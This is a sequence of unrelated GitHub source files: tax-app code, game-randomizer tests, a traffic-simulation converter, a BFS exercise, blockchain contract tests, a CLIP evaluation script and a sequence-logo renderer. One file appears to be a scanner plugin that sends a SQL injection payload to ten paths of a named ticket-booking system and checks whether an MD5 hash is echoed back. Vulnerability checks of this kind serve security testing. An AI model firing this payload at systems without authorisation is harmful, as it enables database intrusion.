taxData = pd.read_csv('countryTax.csv', keep_default_na=False)
# Fill empty fields with blank spaces
        taxData = taxData.fillna({'ProgressiveTaxRange':'', 'CategoryRate': ''})
# Load csv data for company category and load into companyDict dictionary
categoryData = pd.read_csv('categoryDict.csv', keep_default_na=False)
# Generate categoryDict for categoryData
categoryDict = ApplicationWindow.generateCategoryData(categoryData)
companyCode = categoryDict.get(selectedCategoryData)
companySGDIncome = float(companySGDIncome)
companyUSDIncome = ApplicationWindow.convertSGDToUSD(companySGDIncome)
# Assign countryName as key, and calculate the value for differentTaxAmount in option 1, 2, 3, 4 in USD
countriesTaxAmt = ApplicationWindow.generateTaxForOptions(taxData, companyUSDIncome, companyCode)
return countriesTaxAmt
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
application = ApplicationWindow()
application.show()
sys.exit(app.exec_())
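    # Illustrative sketch (not part of the original app): the helper methods above
    # can be exercised without the GUI; the category frame below is made up but
    # mirrors the expected CategoryName/CategoryCode columns.
    #   ApplicationWindow.convertSGDToUSD(1000.0)  # -> 750.0
    #   df = pd.DataFrame({'CategoryName': ['Tech', 'Finance'], 'CategoryCode': ['TEC', 'FIN']})
    #   ApplicationWindow.generateCategoryData(df)  # -> {'Tech': 'TEC', 'Finance': 'FIN'}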
|
larry2967/academic-projects
|
taxcalculator/CompanyTaxSavingsApp.py
|
CompanyTaxSavingsApp.py
|
py
| 14,683
|
python
|
en
|
code
| 0
|
github-code
|
6
|
10423167833
|
from __future__ import annotations
import dataclasses
from random import Random
from unittest.mock import MagicMock
import pytest
from randovania.game_description.game_patches import GamePatches
from randovania.game_description.resources.pickup_index import PickupIndex
from randovania.game_description.resources.resource_type import ResourceType
from randovania.games.common.prime_family.layout.lib.prime_trilogy_teleporters import (
PrimeTrilogyTeleporterConfiguration,
)
from randovania.games.prime2.generator.bootstrap import EchoesBootstrap
from randovania.games.prime2.generator.pickup_pool import sky_temple_keys
from randovania.games.prime2.layout.echoes_configuration import LayoutSkyTempleKeyMode
from randovania.generator.pickup_pool import pool_creator
_GUARDIAN_INDICES = [
PickupIndex(43), # Dark Suit
PickupIndex(79), # Dark Visor
PickupIndex(115), # Annihilator Beam
]
_SUB_GUARDIAN_INDICES = [
PickupIndex(38), # Morph Ball Bomb
PickupIndex(37), # Space Jump Boots
PickupIndex(75), # Boost Ball
PickupIndex(86), # Grapple Beam
PickupIndex(102), # Spider Ball
PickupIndex(88), # Main Power Bombs
]
@pytest.mark.parametrize("vanilla_teleporters", [False, True])
def test_misc_resources_for_configuration(
echoes_resource_database,
default_echoes_configuration,
vanilla_teleporters: bool,
):
# Setup
teleporters = MagicMock(spec=PrimeTrilogyTeleporterConfiguration)
configuration = dataclasses.replace(default_echoes_configuration, teleporters=teleporters)
teleporters.is_vanilla = vanilla_teleporters
gfmc_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGFMCGate")
torvus_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaTorvusTempleGate")
great_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGreatTempleEmeraldGate")
# Run
result = dict(
configuration.game.generator.bootstrap.misc_resources_for_configuration(
configuration,
echoes_resource_database,
)
)
relevant_tricks = {trick: result[trick] for trick in [gfmc_resource, torvus_resource, great_resource]}
# Assert
assert relevant_tricks == {
gfmc_resource: 0,
torvus_resource: 0,
great_resource: 0 if not vanilla_teleporters else 1,
}
@pytest.mark.parametrize("stk_mode", LayoutSkyTempleKeyMode)
def test_assign_pool_results(echoes_game_description, default_echoes_configuration, stk_mode: LayoutSkyTempleKeyMode):
patches = GamePatches.create_from_game(
echoes_game_description, 0, dataclasses.replace(default_echoes_configuration, sky_temple_keys=stk_mode)
)
pool_results = pool_creator.calculate_pool_results(patches.configuration, patches.game)
# Run
result = EchoesBootstrap().assign_pool_results(
Random(1000),
patches,
pool_results,
)
# Assert
shuffled_stks = [
pickup for pickup in pool_results.to_place if pickup.pickup_category == sky_temple_keys.SKY_TEMPLE_KEY_CATEGORY
]
assert result.starting_equipment == pool_results.starting
if stk_mode == LayoutSkyTempleKeyMode.ALL_BOSSES:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES + _SUB_GUARDIAN_INDICES)
elif stk_mode == LayoutSkyTempleKeyMode.ALL_GUARDIANS:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES)
else:
assert len(shuffled_stks) == stk_mode.num_keys
|
randovania/randovania
|
test/games/prime2/generator/test_echoes_bootstrap.py
|
test_echoes_bootstrap.py
|
py
| 3,634
|
python
|
en
|
code
| 165
|
github-code
|
6
|
8385237281
|
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from argparse import ArgumentParser
if 'SUMO_HOME' in os.environ:
sys.path.append(os.path.join(os.environ['SUMO_HOME'], 'tools'))
import sumolib # noqa
def get_options(args=None):
parser = ArgumentParser(description="Sample routes to match counts")
parser.add_argument("-t", "--turn-file", dest="turnFile",
help="Input turn-count file")
parser.add_argument("-o", "--output-file", dest="out",
help="Output edgeRelations file")
parser.add_argument("--turn-attribute", dest="turnAttr", default="probability",
help="Write turning 'probability' to the given attribute")
options = parser.parse_args(args=args)
if options.turnFile is None or options.out is None:
parser.print_help()
sys.exit()
return options
def main(options):
with open(options.out, 'w') as outf:
sumolib.writeXMLHeader(outf, "$Id$", "data", "datamode_file.xsd") # noqa
for interval in sumolib.xml.parse(options.turnFile, 'interval'):
outf.write(' <interval begin="%s" end="%s">\n' % (
interval.begin, interval.end))
if interval.fromEdge:
for fromEdge in interval.fromEdge:
for toEdge in fromEdge.toEdge:
outf.write(' ' * 8 + '<edgeRelation from="%s" to="%s" %s="%s"/>\n' % (
fromEdge.id, toEdge.id, options.turnAttr, toEdge.probability))
outf.write(' </interval>\n')
outf.write('</edgeRelations>\n')
if __name__ == "__main__":
main(get_options())
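# Illustrative usage (not part of the original tool); the file names are made up:
#   python turnFile2EdgeRelations.py -t turnCounts.xml -o edgeRelations.xml
# This reads <interval>/<fromEdge>/<toEdge> turn counts and writes <edgeRelation>
# elements carrying the chosen --turn-attribute (default "probability").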
|
ngctnnnn/DRL_Traffic-Signal-Control
|
sumo-rl/sumo/tools/turn-defs/turnFile2EdgeRelations.py
|
turnFile2EdgeRelations.py
|
py
| 1,716
|
python
|
en
|
code
| 17
|
github-code
|
6
|
14205921043
|
import collections
class Node:
def __init__(self, value):
self.value = value
self.neighbours = []
def make_graph(n_of_nodes, edges):
graph = []
for i in range(n_of_nodes):
node = Node(i+1)
graph.append(node)
for first_node, second_node in edges:
graph[first_node-1].neighbours.append(graph[second_node-1])
graph[second_node-1].neighbours.append(graph[first_node-1])
return graph
def calculate_distances_with_bfs(starting_node, n_of_nodes):
visited = set()
distances = [-1]*n_of_nodes
queue = collections.deque()
queue.append((starting_node, 0))
while queue:
current_node, distance = queue.popleft()
if current_node not in visited:
visited.add(current_node)
distances[current_node.value-1] = distance
for neighbour in current_node.neighbours:
queue.append((neighbour, distance+6))
return distances
def get_distances(n_of_nodes, edges, starting_node_value):
graph = make_graph(n_of_nodes, edges)
starting_node = graph[starting_node_value-1]
distances = calculate_distances_with_bfs(starting_node, n_of_nodes)
distances.remove(0)
return distances
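# Illustrative sketch (not part of the original solution): a small made-up graph.
# Node 5 is unreachable and stays at -1; each hop costs 6, and the starting
# node's own 0 is removed by get_distances.
if __name__ == '__main__':
    example_edges = [(1, 2), (1, 3), (3, 4)]
    print(get_distances(5, example_edges, 1))  # [6, 6, 12, -1]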
|
jdalbosco/hackerrank
|
preparation-kits/one-week/d6-mock_test.py
|
d6-mock_test.py
|
py
| 1,287
|
python
|
en
|
code
| 0
|
github-code
|
6
|
37430288968
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Piaoyou ticket booking system - 10+ SQL injection points
referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
author: Lucifer
description: multiple SQL injection.
'''
import sys
import requests
class piaoyou_ten_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Other/train_input.aspx?memberid=1",
"/Other/hotel_input.aspx?memberid=1",
"/Other/input.aspx?memberid=1",
"/flight/Print_url_sel.aspx?id=2",
"/flight/Xcd_selected.aspx?id=111",
"/System/history.aspx?id=1",
"/flight/scgq.aspx?id=1",
"/Other/Edit.aspx?id=1",
"/flight/Html.aspx?id=1",
"/info/zclist_new.aspx?id=1"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]ๅญๅจ็ฅจๅๆบ็ฅจ้ข่ฎข็ณป็ป10ๅคSQLๆณจๅ
ฅๆผๆด...(้ซๅฑ)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_ten_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/cms/piaoyou/piaoyou_ten_sqli.py
|
piaoyou_ten_sqli.py
|
py
| 1,575
|
python
|
en
|
code
| 1,626
|
github-code
|
6
|
74725395066
|
from datetime import datetime
from pynamodb.models import Model
from pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute
from flask_blog.lib.utils import is_production
import os
class Entry(Model):
class Meta:
table_name = "serverless_blog_entries"
region = 'ap-northeast-1'
        # Settings for the production environment
if is_production():
aws_access_key_id = os.environ.get('SERVERLESS_AWS_ACCESS_KEY_ID')
aws_secret_access_key = os.environ.get('SERVERLESS_AWS_SECRET_KEY')
        # Settings for the development environment
else:
aws_access_key_id = 'AWS_ACEESS_KEY_ID'
aws_secret_access_key = 'AWS_SECRET_ACCESS_KEY'
host = "http://localhost:8000"
    # Column definitions
    id = NumberAttribute(hash_key=True, null=False)  # number
    title = UnicodeAttribute(null=True)  # string
    text = UnicodeAttribute(null=True)  # string
    created_at = UTCDateTimeAttribute(default=datetime.now)  # UTC-based datetime
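# Illustrative sketch (not part of the original module): how an Entry might be
# created against the endpoint configured above; the id/title values are made up.
# if not Entry.exists():
#     Entry.create_table(read_capacity_units=1, write_capacity_units=1, wait=True)
# Entry(id=1, title='hello', text='first post').save()
# print([e.title for e in Entry.scan()])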
|
uni51/serverless_python_tutorial
|
application/flask_blog/models/entries.py
|
entries.py
|
py
| 1,030
|
python
|
en
|
code
| 0
|
github-code
|
6
|
72995183868
|
import os
import sys
import time
import struct
import debug
import eosapi
from eosapi import N, push_transactions
from common import prepare, Sync
from tools import cpp2wast
def init_debug(wasm=True):
def init_decorator(func):
def func_wrapper(*args, **kwargs):
if wasm:
_src_dir = os.path.dirname(os.path.abspath(__file__))
cpp2wast.set_src_path(_src_dir)
cpp2wast.build_native('lab.cpp', 'lab', debug=False)
lib_file = os.path.join(_src_dir, 'liblab.dylib')
# debug.set_debug_contract('lab', lib_file)
return func(*args, **kwargs)
return func_wrapper
return init_decorator
def init(wasm=True):
def init_decorator(func):
def func_wrapper(*args, **kwargs):
if wasm:
prepare('lab', 'lab.wast', 'lab.abi', __file__)
return func(*args, **kwargs)
else:
prepare('lab', 'lab.py', 'lab.abi', __file__)
return func(*args, **kwargs)
return func_wrapper
return init_decorator
_dir = os.path.dirname(os.path.abspath(__file__))
sync = Sync(_account = 'lab', _dir = _dir, _ignore = ['lab.py'])
@init(True)
def test(msg='hello,world'):
r = eosapi.push_action('lab', 'sayhello', msg, {'lab':'active'})
assert r
@init()
def deploy():
sync.deploy_all()
@init()
def deploy_mpy():
sync.deploy_all_mpy()
@init()
def test2(count=100):
import time
import json
actions = []
for i in range(count):
action = ['lab', 'sayhello', str(i), {'lab':'active'}]
actions.append(action)
ret, cost = eosapi.push_actions(actions)
assert ret
print(ret['elapsed'])
print(cost)
print('total cost time:%.3f s, cost per action: %.3f ms, actions per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))
def set_contract(account, src_file, abi_file, vmtype=1, sign=True):
'''Set code and abi for the account
Args:
account (str) : account name
src_file (str) : source file path
abi_file (str) : abi file path
vmtype : virtual machine type, 0 for wasm, 1 for micropython, 2 for evm
sign (bool) : True to sign transaction
Returns:
JsonStruct|None:
'''
account = eosapi.N(account)
code = struct.pack('QBB', account, vmtype, 0)
if vmtype == 0:
with open(src_file, 'rb') as f:
wasm = eosapi.wast2wasm(f.read())
code += eosapi.pack_bytes(wasm)
setcode = [N('eosio'), N('setcode'), [[account, N('active')]], code]
return push_transactions([[setcode]], sign, compress = True)
def build_native():
_src_dir = os.path.dirname(os.path.abspath(__file__))
cpp2wast.set_src_path(_src_dir)
cpp2wast.build_native('lab.cpp', 'lab', debug=False)
lib_file = os.path.join(_src_dir, 'liblab.dylib')
debug.set_debug_contract('lab', lib_file)
@init()
#@init_debug()
def test3(count=200):
actions = []
for i in range(count):
action = ['counter', 'count', str(i), {'counter':'active'}]
actions.append([action])
ret, cost = eosapi.push_transactions(actions)
assert ret
print('total cost time:%.3f s, cost per action: %.3f ms, transaction per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))
|
learnforpractice/pyeos
|
programs/pyeos/tests/wasm/lab/t.py
|
t.py
|
py
| 3,368
|
python
|
en
|
code
| 131
|
github-code
|
6
|
10966117387
|
import os
import clip
import torch.nn as nn
from datasets import Action_DATASETS
from torch.utils.data import DataLoader
from tqdm import tqdm
import wandb
import argparse
import shutil
from pathlib import Path
import yaml
from dotmap import DotMap
import pprint
import numpy
from modules.Visual_Prompt import visual_prompt
from utils.Augmentation import get_augmentation
import torch
from utils.Text_Prompt import *
import pdb
from sklearn.metrics import f1_score
from sklearn.metrics import balanced_accuracy_score
import pandas as pd
import numpy as np
import logging
class TextCLIP(nn.Module):
def __init__(self, model):
super(TextCLIP, self).__init__()
self.model = model
def forward(self, text):
return self.model.encode_text(text)
class ImageCLIP(nn.Module):
def __init__(self, model):
super(ImageCLIP, self).__init__()
self.model = model
def forward(self, image):
return self.model.encode_image(image)
def val_metrics(pred, logger):
# pdb.set_trace()
test_num_each = [5464, 5373, 27014, 4239, 3936, 6258, 10474, 6273,
10512, 6667, 22131, 4661, 8855, 14047, 28896, 4209]
test_num_snippet = [43, 42, 212, 34, 31, 49, 82, 50, 83, 53, 173, 37, 70, 110, 226, 33]
# test_num_rem = [88, 125, 6, 15, 96, 114, 106, 1, 16, 11, 115, 53, 23, 95, 96, 113]
mean_weighted_f1 = 0.0
mean_unweighted_f1 = 0.0
mean_global_f1 = 0.0
mean_balanced_acc = 0.0
each_wf1 = []
each_unf1 = []
each_gf1 = []
each_bacc = []
test_labels_pth = ''
for i in range(16):
predi = pred[sum(test_num_snippet[:i]): sum(test_num_snippet[:i+1])]
predi = [p for p in predi for _ in range(128)]
predi = predi[:test_num_each[i]]
tl_pth = test_labels_pth + '/test_video_' + str(i).zfill(4) + '.csv'
ls = np.array(pd.read_csv(tl_pth, usecols=['frame_label']))
label = []
predict = []
for idx, l in enumerate(ls):
if not np.isnan(l):
label.append(int(l))
predict.append(predi[idx])
# pdb.set_trace()
mean_weighted_f1 += f1_score(label, predict, average='weighted')/16.0
mean_unweighted_f1 += f1_score(label, predict, average='macro') / 16.0
mean_global_f1 += f1_score(label, predict, average='micro') / 16.0
mean_balanced_acc += balanced_accuracy_score(label, predict) / 16.0
each_wf1.append(f1_score(label, predict, average='weighted'))
each_unf1.append(f1_score(label, predict, average='macro'))
each_gf1.append(f1_score(label, predict, average='micro'))
each_bacc.append(balanced_accuracy_score(label, predict))
# print('video: ', i, 'label: ', label, 'predict: ', predict)
logger.info('wf1: {}'.format(each_wf1))
logger.info('unf1:{}'.format(each_unf1))
logger.info('gf1:{}'.format(each_gf1))
logger.info('bacc:{}'.format(each_bacc))
return mean_weighted_f1, mean_unweighted_f1, mean_global_f1, mean_balanced_acc
def validate_val(epoch, val_loader, classes, device, model, fusion_model, config, num_text_aug):
model.eval()
fusion_model.eval()
num = 0
corr_1 = 0
corr_5 = 0
predict_list = []
label_list = []
label2 = []
pred2 = []
with torch.no_grad():
text_inputs = classes.to(device)
text_features = model.encode_text(text_inputs) # (bs*num_classes, 512)
for iii, (image, class_id) in enumerate(tqdm(val_loader)):
# image: (bs, 24, 224, 224)
image = image.view((-1, config.data.num_segments, 3) + image.size()[-2:])
# image: (16, 8, 3, 224, 224)
b, t, c, h, w = image.size()
class_id = class_id.to(device)
image_input = image.to(device).view(-1, c, h, w)
image_features = model.encode_image(image_input).view(b, t, -1)
image_features = fusion_model(image_features) # (bs, 512)
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
similarity = (100.0 * image_features @ text_features.T)
similarity = similarity.view(b, num_text_aug, -1)
# pdb.set_trace()
similarity = similarity.softmax(dim=-1)
similarity = similarity.mean(dim=1, keepdim=False)
values_1, indices_1 = similarity.topk(1, dim=-1)
# values_5, indices_5 = similarity.topk(5, dim=-1)
num += b
# print(indices_1)
# print(class_id)
# pdb.set_trace()
for i in range(b):
if values_1[i] < 0.5:
indices_1[i] = -1
# pdb.set_trace()
label_list.append(int(class_id[i].cpu().numpy()))
predict_list.append(indices_1[i].cpu().numpy()[0])
# if indices_1[i] == class_id[i]:
# corr_1 += 1
# if class_id[i] in indices_5[i]:
# corr_5 += 1
# pdb.set_trace()
# f1score = f1_score(label2, pred2, average='weighted')
# acc = accuracy_score(label2, pred2)
# pdb.set_trace()
bacc = balanced_accuracy_score(label_list, predict_list)
print('Epoch: [{}/{}]: bacc:{}'.format(epoch, config.solver.epochs, bacc))
return bacc
def validate(epoch, val_loader, classes, device, model, fusion_model, config, num_text_aug, logger):
model.eval()
fusion_model.eval()
num = 0
corr_1 = 0
corr_5 = 0
predict_list = []
label_list = []
label2 = []
pred2 = []
with torch.no_grad():
text_inputs = classes.to(device)
text_features = model.encode_text(text_inputs) # (bs*num_classes, 512)
for iii, (image, class_id) in enumerate(tqdm(val_loader)):
# image: (bs, 24, 224, 224)
image = image.view((-1, config.data.num_segments, 3) + image.size()[-2:])
# image: (16, 8, 3, 224, 224)
b, t, c, h, w = image.size()
class_id = class_id.to(device)
image_input = image.to(device).view(-1, c, h, w)
image_features = model.encode_image(image_input).view(b, t, -1)
image_features = fusion_model(image_features) # (bs, 512)
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
similarity = (100.0 * image_features @ text_features.T)
similarity = similarity.view(b, num_text_aug, -1)
# pdb.set_trace()
similarity = similarity.softmax(dim=-1)
similarity = similarity.mean(dim=1, keepdim=False)
values_1, indices_1 = similarity.topk(1, dim=-1)
# values_5, indices_5 = similarity.topk(5, dim=-1)
num += b
# print(indices_1)
# print(class_id)
# pdb.set_trace()
for i in range(b):
# if values_1[i] < 0.5:
# indices_1[i] = -1
# pdb.set_trace()
# label_list.append(int(class_id[i].cpu().numpy()))
predict_list.append(indices_1[i].cpu().numpy()[0])
# if indices_1[i] == class_id[i]:
# corr_1 += 1
# if class_id[i] in indices_5[i]:
# corr_5 += 1
# pdb.set_trace()
# f1score = f1_score(label2, pred2, average='weighted')
# acc = accuracy_score(label2, pred2)
wf1, unf1, gf1, bacc = val_metrics(predict_list, logger)
# top1 = f1score
# top5 = float(corr_5) / num * 100
# wandb.log({"top1": top1})
# wandb.log({"top5": top5})
# print('Epoch: [{}/{}]: Top1: {}, Top5: {}'.format(epoch, config.solver.epochs, top1, top5))
logger.info('Epoch: [{}/{}]: wf1:{:.3f} unf1:{:.3f} gf1:{:.3f} bacc:{:.3f}'.format(epoch, config.solver.epochs, wf1, unf1, gf1, bacc))
return wf1
def main():
global args, best_prec1
global global_step
parser = argparse.ArgumentParser()
parser.add_argument('--config', '-cfg', default='')
parser.add_argument('--log_time', default='')
args = parser.parse_args()
with open(args.config, 'r') as f:
        config = yaml.load(f, Loader=yaml.FullLoader)
working_dir = os.path.join('./exp', config['network']['type'], config['network']['arch'], config['data']['dataset'],
args.log_time)
wandb.init(project=config['network']['type'],
name='{}_{}_{}_{}'.format(args.log_time, config['network']['type'], config['network']['arch'],
config['data']['dataset']))
print('-' * 80)
print(' ' * 20, "working dir: {}".format(working_dir))
print('-' * 80)
print('-' * 80)
print(' ' * 30, "Config")
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(config)
print('-' * 80)
config = DotMap(config)
Path(working_dir).mkdir(parents=True, exist_ok=True)
shutil.copy(args.config, working_dir)
shutil.copy('test.py', working_dir)
device = "cuda" if torch.cuda.is_available() else "cpu" # If using GPU then use mixed precision training.
model, clip_state_dict = clip.load(config.network.arch, device=device, jit=False, tsm=config.network.tsm,
T=config.data.num_segments, dropout=config.network.drop_out,
emb_dropout=config.network.emb_dropout) # Must set jit=False for training ViT-B/32
transform_val = get_augmentation(False, config)
fusion_model = visual_prompt(config.network.sim_header, clip_state_dict, config.data.num_segments)
model_text = TextCLIP(model)
model_image = ImageCLIP(model)
model_text = torch.nn.DataParallel(model_text).cuda()
model_image = torch.nn.DataParallel(model_image).cuda()
fusion_model = torch.nn.DataParallel(fusion_model).cuda()
wandb.watch(model)
wandb.watch(fusion_model)
val_data = Action_DATASETS(config.data.val_list, config.data.label_list, num_segments=config.data.num_segments,
image_tmpl=config.data.image_tmpl,
transform=transform_val, random_shift=config.random_shift)
val_loader = DataLoader(val_data, batch_size=config.data.batch_size, num_workers=config.data.workers, shuffle=False,
pin_memory=True, drop_last=True)
if device == "cpu":
model_text.float()
model_image.float()
else:
clip.model.convert_weights(
model_text) # Actually this line is unnecessary since clip by default already on float16
clip.model.convert_weights(model_image)
start_epoch = config.solver.start_epoch
if config.pretrain:
if os.path.isfile(config.pretrain):
print(("=> loading checkpoint '{}'".format(config.pretrain)))
checkpoint = torch.load(config.pretrain)
model.load_state_dict(checkpoint['model_state_dict'])
fusion_model.load_state_dict(checkpoint['fusion_model_state_dict'])
del checkpoint
else:
print(("=> no checkpoint found at '{}'".format(config.pretrain)))
classes, num_text_aug, text_dict = text_prompt(val_data)
    best_prec1 = 0.0
    # validate() expects a logger; create a basic one here
    logging.basicConfig(level=logging.INFO)
    logger = logging.getLogger(__name__)
    prec1 = validate(start_epoch, val_loader, classes, device, model, fusion_model, config, num_text_aug, logger)
if __name__ == '__main__':
main()
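# Illustrative invocation (not part of the original script); the config path and
# log-time tag are made-up placeholders:
#   python test.py --config configs/some_config.yaml --log_time 2023-01-01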
|
Lycus99/SDA-CLIP
|
test.py
|
test.py
|
py
| 11,801
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3469450468
|
# As per the requirements:
# Marshall Christian 001520145
# This table was inspired with the help of Cemel Tepe as well as Cemel Tepe - "Let's go hashing"
# Space complexity = O(n)
class HashTable(object):
def __init__(self, size=10):
self._struct = self.struct_creation(size)
# insert() hashes the key. Then finds the modular
# Then, uses the modular to find the appropriate bucket to append
# Time complexity: O(n) - 'n' being the size of the bucket
def insert(self, key, value):
hashed_key = hash(key)
bucket = self.find_bucket(hashed_key)
mod = self.look_up_key_value_pair(hashed_key, bucket)
if len(mod) == 0:
bucket.append([hashed_key, value])
else:
mod[1] = value
return True
    # remove() hashes the key, finds the matching bucket and removes the key-value pair if present.
    # Time complexity: O(n) - 'n' being the size of the bucket
    def remove(self, key):
        hashed_key = hash(key)
        bucket = self.find_bucket(hashed_key)
        key_value_pair = self.look_up_key_value_pair(hashed_key, bucket)
        if key_value_pair:
            bucket.remove(key_value_pair)
    # struct_creation() loops through the hash table and creates buckets for later
# Time complexity: O(n)
def struct_creation(self, size):
struct = []
for i in range(size):
struct.append([])
return struct
# find() takes a key, hashes it and finds the matching bucket
# Then, loops through the bucket to find the key-value pair
# Time complexity: O(n) - 'n' being the size of the bucket
def look_up(self, key):
hashed_key = hash(key)
bucket = self.find_bucket(hashed_key)
key_value_pair = self.look_up_key_value_pair(hashed_key, bucket)
if key_value_pair:
return key_value_pair[1]
raise Exception("Key-Value pair does not exist")
# find_key_value_pair() loops through the bucket to find the needed key with value pair
# Time complexity: O(n)
    def look_up_key_value_pair(self, key, bucket):
        for key_value_pair in bucket:
            if key_value_pair[0] == key:
                return key_value_pair
        return []
# find_bucket() uses hashed key to find the needed bucket
# Time complexity: O(1)
def find_bucket(self, key):
return self._struct[key % len(self._struct)]
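# Illustrative sketch (not part of the original file): basic usage of the
# chained hash table above, with made-up package IDs.
if __name__ == '__main__':
    table = HashTable(size=10)
    table.insert(1, 'package at hub')
    table.insert(11, 'package out for delivery')  # lands in the same bucket as key 1
    print(table.look_up(1))    # package at hub
    print(table.look_up(11))   # package out for delivery
    table.remove(1)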
|
MarsTheProgrammer/Delivery-System-for-Packages
|
HashTable.py
|
HashTable.py
|
py
| 2,237
|
python
|
en
|
code
| 0
|
github-code
|
6
|
44091100190
|
import os
import os.path
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
_logo_fonts = { "Arial" : ImageFont.truetype(os.path.abspath(os.path.dirname(__file__))+"/arial.ttf", 200),
"ArialBold" : ImageFont.truetype(os.path.abspath(os.path.dirname(__file__))+"/arialbd.ttf", 200),
"Courier" : ImageFont.truetype(os.path.abspath(os.path.dirname(__file__))+"/cour.ttf", 200) }
_lettercache_unsized = {}
_lettercache = {}
def _autocrop(I):
I = np.array(I)
# Cut out all the rows/columns that are all white
I = I[np.where(np.any(I[:,:,:3].min(axis=1)!=255,axis=1))[0],:,:] # Crop vertical
I = I[:,np.where(np.any(I[:,:,:3].min(axis=0)!=255,axis=1))[0],:] # Crop horizontal
# Add white border. Helps avoid edge artifacts when resizing down with anti-aliasing
pad1 = 255*np.ones_like(I[:1,:,:]); pad1[:,:,3] = 0
I = np.vstack([pad1, I, pad1])
pad2 = 255*np.ones_like(I[:,:3,:]); pad2[:,:,3] = 0
I = np.hstack([pad2, I, pad2])
return Image.fromarray(I)
uparrow_chr = u'\u25B2'
def _get_letterimg_unsized(letter, font):
global _lettercache_unsized
global _logo_fonts
colors = { "A" : (0,200,0),
"C" : (0,0,200),
"G" : (235,140,0),
"T" : (200,0,0),
"U" : (200,0,0),
"N" : (128,128,128),
uparrow_chr : (128,128,128) }
assert letter in colors, "Unrecognized letter"
assert font in _logo_fonts, "Unrecognized font"
if (letter,font) not in _lettercache_unsized:
# Draw full-sized versions of this letter
letterimg = 255*np.ones((256,256,4), np.uint8)
letterimg[:,:,3] = 0 # Transparent by default
letterimg = Image.fromarray(letterimg)
draw = ImageDraw.Draw(letterimg)
draw.text((1,1), letter, colors[letter], font=_logo_fonts[font])
letterimg = _autocrop(letterimg)
_lettercache_unsized[(letter,font)] = letterimg
return _lettercache_unsized[(letter,font)]
def get_letterimg(letter, width, height, font="ArialBold"):
global _lettercache
assert width and height
    # If we've never been asked for a letter of this width/height before,
# then we use Image.resize to generate a new one.
if (letter,width,height,font) not in _lettercache:
letterimg = _get_letterimg_unsized(letter, font)
letterimg = letterimg.resize((width, height), Image.ANTIALIAS)
_lettercache[(letter,width,height,font)] = np.array(letterimg).reshape((height,width,4))
return _lettercache[(letter,width,height,font)]
def tape2logo(tape, height=51, letterwidth=6, bufferzoom=4, refseq=None, vmax=None, style=None, rna=False, transparent=False, complement=False):
# Styles "stack" "grow" "growclip" "growfade" "bars" "bar"
tapedim,tapelen = tape.shape # n = number of filters
if tapedim != 4:
raise NotImplementedError("Expected tape with 4 rows")
if vmax is not None:
tape = np.maximum(-vmax, np.minimum(vmax, tape))
zheight = height*bufferzoom
zletterwidth = letterwidth*bufferzoom
mid1 = (zheight-bufferzoom)//2
mid2 = (zheight-bufferzoom)//2 + bufferzoom
if refseq:
assert len(refseq) == tapelen
refseq_height = int(letterwidth*bufferzoom*1.1)
# Create an up-arrow image
arrowheight = int(refseq_height*0.15)
uparrow_img = get_letterimg(uparrow_chr, zletterwidth//2, arrowheight, font="Arial")
pad1 = 255*np.ones((arrowheight, zletterwidth//4, 4))
pad1[:,:,3] = 0
uparrow_img = np.hstack([pad1, uparrow_img])
pad2 = 255*np.ones((arrowheight, zletterwidth-uparrow_img.shape[1], 4))
pad2[:,:,3] = 0
uparrow_img = np.hstack([uparrow_img, pad2])
mid1 -= refseq_height//2+2*bufferzoom
mid2 = mid1+refseq_height+4*bufferzoom
positive_only = bool(np.all(tape.ravel() >= 0)) or (style in ("grow", "growfade","bar"))
if positive_only:
mid1 = zheight
mid2 = zheight
translate = { "A":"A", "C":"C", "G":"G", "T":"T", "U":"U", "N":"N" }
if complement:
translate = { "A":"T", "C":"G", "G":"C", "T":"A", "U":"A", "N":"N" }
lettertable = ["A","C","G","U" if rna else "T"]
barcolors = { "A" : (128,220,128),
"C" : (128,128,220),
"G" : (245,200,90),
"T" : (220,128,128),
"U" : (220,128,128),
"N" : (192,192,192) }
def make_lettercol(t, colheight, reverse):
# Only show letters with positive coefficient in f
idx = [i for i in range(4) if t[i] > 0]
# Put largest positive value first in "above", and put largest negative value last in "below"
idx = sorted(idx, key=lambda i: t[i])
# Calculate the individual zheight of each letter in pixels
zheights = [int(round(t[i]/sum(t[idx])*colheight)) for i in idx]
idx = [i for i,h in zip(idx,zheights) if h > 0]
zheights = [h for h in zheights if h > 0]
# While the stack of letters is too tall, remove pixel rows from the smallest-zheight entries
#print sum(zheights) - mid1
while sum(zheights) > mid1:
zheights[-1] -= 1
if zheights[-1] == 0:
zheights.pop()
idx.pop()
# Make the individual images, reversing their order if so requested
